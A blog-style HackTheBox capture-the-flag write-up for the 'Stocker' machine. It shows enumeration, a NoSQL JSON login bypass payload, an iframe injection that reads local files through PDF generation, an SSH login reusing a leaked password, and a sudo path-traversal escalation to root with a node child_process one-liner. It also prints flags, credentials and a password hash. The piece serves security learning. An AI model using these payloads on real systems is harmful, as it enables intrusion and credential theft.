Post

HackTheBox Writeup Stocker

HackTheBox Writeup Stocker

Stocker is a medium difficulty Linux machine that features a website running on port 80 that advertises various house furniture. Through vHost enumeration the hostname dev.stocker.htb is identified and upon accessing it a login page is loaded that seems to be built with NodeJS. By sending JSON data and performing a NoSQL injection, the login page is bypassed and access to an e-shop is granted. Enumeration of this e-shop reveals that upon submitting a purchase order, a PDF is crafted that contains details about the items purchased. This functionality is vulnerable to HTML injection and can be abused to read system files through the usage of iframes. The index.js file is then read to acquire database credentials and owed to password re-use users can log into the system over SSH. Privileges can then be escalated by performing a path traversal attack on a command defined in the sudoers file, which contains a wildcard for executing JavaScript files.

Recon


Autorecon

Add to hosts before running autorecon!

1
sudo $(which autorecon) -vv stocker.htb

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~/htb/Stocker]
└─$ cat stocker.nmap

# Nmap 7.94 scan initiated Sat Jun 24 11:24:14 2023 as: nmap -sVC -p- -T4 -Pn -vv -oA stocker 10.10.11.196
Nmap scan report for stocker.htb (10.10.11.196)
Host is up, received user-set (0.062s latency).
Scanned at 2023-06-24 11:24:15 EDT for 41s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3d:12:97:1d:86:bc:16:16:83:60:8f:4f:06:e6:d5:4e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/Jyuj3D7FuZQdudxWlH081Q6WkdTVz6G05mFSFpBpycfOrwuJpQ6oJV1I4J6UeXg+o5xHSm+ANLhYEI6T/JMnYSyEmVq/QVactDs9ixhi+j0R0rUrYYgteX7XuOT2g4ivyp1zKQP1uKYF2lGVnrcvX4a6ds4FS8mkM2o74qeZj6XfUiCYdPSVJmFjX/TgTzXYHt7kHj0vLtMG63sxXQDVLC5NwLs3VE61qD4KmhCfu+9viOBvA1ZID4Bmw8vgi0b5FfQASbtkylpRxdOEyUxGZ1dbcJzT+wGEhalvlQl9CirZLPMBn4YMC86okK/Kc0Wv+X/lC+4UehL//U3MkD9XF3yTmq+UVF/qJTrs9Y15lUOu3bJ9kpP9VDbA6NNGi1HdLyO4CbtifsWblmmoRWIr+U8B2wP/D9whWGwRJPBBwTJWZvxvZz3llRQhq/8Np0374iHWIEG+k9U9Am6rFKBgGlPUcf6Mg7w4AFLiFEQaQFRpEbf+xtS1YMLLqpg3qB0=
|   256 7c:4d:1a:78:68:ce:12:00:df:49:10:37:f9:ad:17:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgPXCNqX65/kNxcEEVPqpV7du+KsPJokAydK/wx1GqHpuUm3lLjMuLOnGFInSYGKlCK1MLtoCX6DjVwx6nWZ5w=
|   256 dd:97:80:50:a5:ba:cd:7d:55:e8:27:ed:28:fd:aa:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIDyp1s8jG+rEbfeqAQbCqJw5+Y+T17PRzOcYd+W32hF
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 4EB67963EC58BC699F15F80BBE1D91CC
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-generator: Eleventy v2.0.0
|_http-title: Stock - Coming Soon!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Jun 24 11:24:56 2023 -- 1 IP address (1 host up) scanned in 41.93 seconds
1
echo '10.10.11.196 stocker.htb' >> /etc/hosts

80 - Website

Info

Directory

1
feroxbuster -u http://stocker.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -r -o "/home/kali/htb/Stocker/results/stocker.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
200      GET       20l      129w     9226c http://stocker.htb/img/apple-touch-icon.png
200      GET        6l       21w     1354c http://stocker.htb/img/favicon-32x32.png
200      GET       39l      197w    15603c http://stocker.htb/img/webp/people23.webp
200      GET       91l      507w    41060c http://stocker.htb/fonts/inter-v12-latin-700.woff
200      GET       56l      418w    32043c http://stocker.htb/fonts/inter-v12-latin-700.woff2
200      GET      122l      561w    41547c http://stocker.htb/img/webp/people2.webp
200      GET       40l      241w    18399c http://stocker.htb/img/webp/people1.webp
200      GET       78l      424w    31843c http://stocker.htb/fonts/inter-v12-latin-500.woff2
200      GET        4l       10w      696c http://stocker.htb/img/favicon-16x16.png
200      GET       97l      503w    40143c http://stocker.htb/fonts/inter-v12-latin-300.woff
200      GET      176l     1153w    89907c http://stocker.htb/img/webp/interior29.webp
200      GET        6l      546w    42350c http://stocker.htb/css/theme.min.css
200      GET        1l      268w    13800c http://stocker.htb/js/aos.js
200      GET       12l       62w     3907c http://stocker.htb/img/webp/interior37.webp
200      GET       55l      383w    31373c http://stocker.htb/fonts/inter-v12-latin-300.woff2
200      GET       81l      475w    40738c http://stocker.htb/fonts/inter-v12-latin-500.woff
200      GET        7l     1222w    79742c http://stocker.htb/js/bootstrap.bundle.min.js
200      GET     2059l    12963w   984134c http://stocker.htb/img/angoose.png
200      GET      321l     1360w    15463c http://stocker.htb/
403      GET        7l       10w      162c http://stocker.htb/css/
200      GET        1l        4w     2174c http://stocker.htb/favicon.ico
403      GET        7l       10w      162c http://stocker.htb/fonts/
403      GET        7l       10w      162c http://stocker.htb/img/
200      GET      321l     1360w    15463c http://stocker.htb/index.html
403      GET        7l       10w      162c http://stocker.htb/js/

Sub Domains

1
ffuf -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.stocker.htb" -u http://stocker.htb -fc 301
1
2
3
4
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 67ms]
    * FUZZ: dev

:: Progress: [100000/100000] :: Job [1/1] :: 655 req/sec :: Duration: [0:02:28] :: Errors: 0 ::

dev.stocker.htb

Directory

1
feroxbuster -u http://dev.stocker.htb -t 100 -nr
1
2
3
4
5
6
7
...
404      GET       10l       15w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       75l      200w     2667c http://dev.stocker.htb/login
200      GET       75l      200w     2667c http://dev.stocker.htb/Login
200      GET       39l       62w      597c http://dev.stocker.htb/static/css/signin.css
200      GET       75l      200w     2667c http://dev.stocker.htb/login?error=auth-required
200      GET       75l      200w     2667c http://dev.stocker.htb/LOGIN

User Flag


NoSQL login Bypass

stocker.htb is just a static website

Dig deeper to dev.stocker.htb

Try bruteforce

1
2
3
4
5
6
7
# Common usernames and passwords
ffuf -c -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZ1 -w /usr/share/seclists/Passwords/darkweb2017-top100.txt:FUZZ2 -request login.req -request-proto http -v -fs 92


# User: Admin
ffuf -c -w /opt/wordlists/rockyou.txt:FUZZ2 -request login.req -request-proto http -v -fs 92

Try login bypass

1
ffuf -c -w /usr/share/payloadsallthethings/SQL\ Injection/Intruder/Auth_Bypass.txt:FUZZ1 -request login.req -v -request-proto http -fs 92

Enumerate the backend

1
whatweb -v dev.stocker.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
WhatWeb report for http://dev.stocker.htb/login
Status    : 200 OK
Title     : Stockers Sign-in
IP        : 10.10.11.196
Country   : RESERVED, ZZ

Summary   : Bootstrap, Cookies[connect.sid], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], HttpOnly[connect.sid], Meta-Author[Mark Otto, Jacob Thornton, and Bootstrap contributors], MetaGenerator[Hugo 0.84.0], nginx[1.18.0], PasswordField[password], Script, X-Powered-By[Express]

Detected Plugins:
...

[ Cookies ]
        Display the names of cookies in the HTTP headers. The
        values are not returned to save on space.

        String       : connect.sid

[ HTML5 ]
...


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : nginx/1.18.0 (Ubuntu) (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie
        response header and the browser supports it then the cookie
        cannot be accessed through client side script - More Info:
        http://en.wikipedia.org/wiki/HTTP_cookie

        String       : connect.sid

[ Meta-Author ]
...

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its
        value.

        String       : Hugo 0.84.0

[ PasswordField ]
...

[ Script ]
...


[ X-Powered-By ]
        X-Powered-By HTTP header

        String       : Express (from x-powered-by string)

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance
        HTTP server and reverse proxy, as well as an IMAP/POP3
        proxy server.

        Version      : 1.18.0
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Sat, 24 Jun 2023 15:58:39 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        X-Powered-By: Express
        Cache-Control: public, max-age=0
        Last-Modified: Tue, 06 Dec 2022 09:53:59 GMT
        ETag: W/"a6b-184e6db4279"
        Set-Cookie: connect.sid=s%3AQbq2IZjXDEzGaH-wmmHTmh9BTY5_qJ2C.CYwUZxCiHMyLaD8oFWVy9c0b%2F9Vh052Q6CoeIqMtLQE; Path=/; HttpOnly
        Content-Encoding: gzip
  • It’s using Express
  • Its cookie is connect.sid, after googling, noticed that it’s widely used by node.js applications, which means it’s likely using nosql
  • It was built by Hugle

Google nosql login bypass

https://book.hacktricks.xyz/pentesting-web/nosql-injection

Working Payload:

1
{"username": {"$ne": null}, "password": {"$ne": null} }

Needs to change Content-type to json!

Found a repo to auto check for login bypass payloads

https://github.com/C4l1b4n/NoSQL-Attack-Suite

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/htb/Stocker/NoSQL-Attack-Suite]
└─$ proxychains -q python nosql-login-bypass.py -t http://dev.stocker.htb/login -u username -p password

[*] Checking for auth bypass GET request...
[-] Login is probably NOT vulnerable to GET request auth bypass...

[*] Checking for auth bypass POST request...
[-] Login is probably NOT vulnerable to POST request auth bypass...

[*] Checking for auth bypass POST JSON request...
[+] Login is probably VULNERABLE to POST JSON request auth bypass!
[!] PAYLOAD: {"username": {"$ne": "dummyusername123"}, "password": {"$ne": "dummypassword123"}}

Local File Inclusion

Purchase something

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/htb/Stocker]
└─$ exiftool 649717ef671649577d017322.pdf
ExifTool Version Number         : 12.63
File Name                       : 649717ef671649577d017322.pdf
Directory                       : .
File Size                       : 38 kB
File Modification Date/Time     : 2023:06:24 12:21:11-04:00
File Access Date/Time           : 2023:06:24 12:21:24-04:00
File Inode Change Date/Time     : 2023:06:24 12:21:24-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Tagged PDF                      : Yes
Creator                         : Chromium
Producer                        : Skia/PDF m108
Create Date                     : 2023:06:24 16:21:08+00:00
Modify Date                     : 2023:06:24 16:21:08+00:00

Google : skia pdf exploit

  • https://www.triskelelabs.com/blog/extracting-your-aws-access-keys-through-a-pdf-file

1
<iframe src=file:////etc/passwd> 

It does render html to the PDF

Shell as angoose

Make the iframe larger to see full result

1
<iframe src=file:////etc/passwd width='1000'height='1000'>

List users

1
2
3
4
┌──(kali㉿kali)-[~/htb/Stocker]
└─$ cat passwd| grep sh$
root:x:0:0:root:/root:/bin/bash
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash

Tried:

  • /home/angoose/.ssh/id_rsa
  • /proc/self/cmdline

According to previous json error while logging in

Check /var/www/dev/index.js (or /proc/self/cwd/index.js) ^2c638f

Try password reuse for SSH

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/htb/Stocker]
└─$ sshpass -p 'IHeardPassphrasesArePrettySecure' ssh -o "StrictHostKeyChecking no" angoose@stocker.htb
Warning: Permanently added 'stocker.htb' (ED25519) to the list of known hosts.
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ cat user.txt
c82d3667211206344c0abfc35ea8ebf5
angoose@stocker:~$

Root Flag


1
2
3
4
5
6
7
angoose@stocker:~$ sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

Gtfobin - https://gtfobins.github.io/gtfobins/node/

1
2
3
angoose@stocker:~$ cd /usr/local/scripts/
angoose@stocker:/usr/local/scripts$ touch a.js
touch: cannot touch 'a.js': Permission denied

Do directory traversal

1
2
3
4
5
6
7
angoose@stocker:/usr/local/scripts$ echo 'require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})' > /dev/shm/a.js
angoose@stocker:/usr/local/scripts$ sudo /usr/bin/node /usr/local/scripts/../../../dev/shm/a.js
root@stocker:/usr/local/scripts# id
uid=0(root) gid=0(root) groups=0(root)
root@stocker:/usr/local/scripts# cat /root/root.txt
58980ac7319d07992c1b6b6735cec69b
root@stocker:/usr/local/scripts#

Additional


Dump Mongo DB

1
2
3
4
5
6
7
8
9
10
11
12
angoose@stocker:~$ mongodump 'mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1'
2023-06-25T06:53:09.444+0000    WARNING: On some systems, a password provided directly in a connection string or using --uri may be visible to system status programs such as `ps` that may be invoked by other users. Consider omitting the password to provide it via stdin, or using the --config option to specify a configuration file with the password.
2023-06-25T06:53:09.484+0000    writing dev.products to dump/dev/products.bson
2023-06-25T06:53:09.485+0000    writing dev.orders to dump/dev/orders.bson
2023-06-25T06:53:09.486+0000    writing dev.users to dump/dev/users.bson
2023-06-25T06:53:09.487+0000    writing dev.sessions to dump/dev/sessions.bson
2023-06-25T06:53:09.488+0000    done dumping dev.orders (3 documents)
2023-06-25T06:53:09.489+0000    done dumping dev.products (4 documents)
2023-06-25T06:53:09.491+0000    writing dev.basketitems to dump/dev/basketitems.bson
2023-06-25T06:53:09.492+0000    done dumping dev.users (1 document)
2023-06-25T06:53:09.492+0000    done dumping dev.sessions (6 documents)
2023-06-25T06:53:09.495+0000    done dumping dev.basketitems (0 documents)
1
2
3
4
5
6
7
8
9
angoose@stocker:~$ cd dump/
angoose@stocker:~/dump$ ls
dev
angoose@stocker:~/dump$ cd dev
angoose@stocker:~/dump/dev$ ls
basketitems.bson  basketitems.metadata.json  orders.bson  orders.metadata.json  products.bson  products.metadata.json  sessions.bson  sessions.metadata.json  users.bson  users.metadata.json
angoose@stocker:~/dump/dev$ bsondump users.bson
{"_id":{"$oid":"638f116eeb060210cbd83a8a"},"username":"angoose","password":"b3e795719e2a644f69838a593dd159ac","__v":{"$numberInt":"0"}}
2023-06-25T06:54:25.057+0000    1 objects found
This post is licensed under CC BY 4.0 by the author.